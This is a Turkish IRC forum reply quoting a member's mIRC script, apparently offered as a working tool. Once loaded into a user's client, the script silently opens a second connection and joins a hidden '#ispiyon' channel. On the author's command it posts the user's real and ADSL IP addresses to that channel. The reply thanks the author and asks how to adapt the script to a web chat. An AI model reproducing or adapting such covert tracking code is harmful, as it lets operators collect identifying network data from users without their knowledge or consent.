Tekil Mesaj gösterimi
Alt 02 Eylül 2008, 03:10   #33
seal
Kullanıcıların profil bilgileri misafirlere kapatılmıştır.
IF Ticaret Sayısı: (0)
IF Ticaret Yüzdesi:(%)
Cevap: IP Adresinden MAC adresine ulaşmak

L4roXyL Nickli Üyeden Alıntı
Bu forumdaki linkleri ve resimleri görebilmek için en az 25 mesajınız olması gerekir.
Önceden yazmış olduğum bir kod vardı.
Bu kod'u mIRC'ine ekliyen kişi belirlediğiniz sunucuya bağlandığında, aynı sunucuya sock bağlantı açılır.
Sock bağlantı açıldıktan sonra, sunucu'daki #ispiyon kanal'ına girer.
Ve siz !ispiyon yazdığınız'da, kişinin IP ve en önemlisi TTNET tarafından verilen gerçek IP numarasını verir.(NOT: Bu gerçek IP numarası reset vs. gibi işlevlerle değiştirilemez. Değiştirmek için; ADSL sağlıyıcısını aramak zorunludur.)

Kod:   Kodu kopyalamak için üzerine çift tıklayın!
alias ayr return $remove($gettok($1-,1,33),$chr(58)) on *:connect:if $server == irc.sunucunuz.uzantısı { sockopen ajan $server 6667 } on *:sockopen:ajan: { var %t = $+(IP,$r(1,999)),%u = $+(mIRC,$r(1,999)) sockwrite -n ajan nick %t sockwrite -n ajan user %u * * $sock(ajan).addr sockmark ajan %t set %& $+(Gerçek IP:,$chr(32),$ip,$chr(32),ADSL IP:,$chr(32),$sock(ajan).bindip) } on *:sockread:ajan: { var %y | sockread %y | tokenize %y | _ok %y } alias _ok { if $sock(ajan) { if $1 == PING { sockwrite -n ajan PONG $remove($2,$chr(58)) } if $ayr($1) == $sock(ajan).mark && $2 == JOIN { if $remove($3,$chr(58)) != #ispiyon { sockwrite -n ajan part $remove($3,$chr(58)) } } if $remove($1,$chr(58)) == $sock(ajan).mark && $2 == MODE && $3 == $sock(ajan).mark { sockwrite -n ajan join #ispiyon } if $2 == privmsg && $3 == #ispiyon && $remove($4,$chr(58)) == !ispiyon && $ayr($1) == NICK'iniz { sockwrite -n ajan privmsg #ispiyon Son veriler: %& | sockclose ajan } } }

Bu kod kullanıma göre, daha doğrusu yeteneğe göre bazı olayların önüne geçebilmenizi sağlıyacaktır. .)

Teşekkürler. Yalnız Mirc koduna demişsiniz. Ben irc girişine şifre kodum, Mirc kullandırtmıyorum sadece webden bağlantı sağlıyorum. Bunu Eschat'e nasıl uygulayabilirim acaba
Bu forumdaki linkleri ve resimleri görebilmek için en az 25 mesajınız olması gerekir.

IRCForumlari.NET Reklamlar
sohbet odaları eglen sohbet reklamver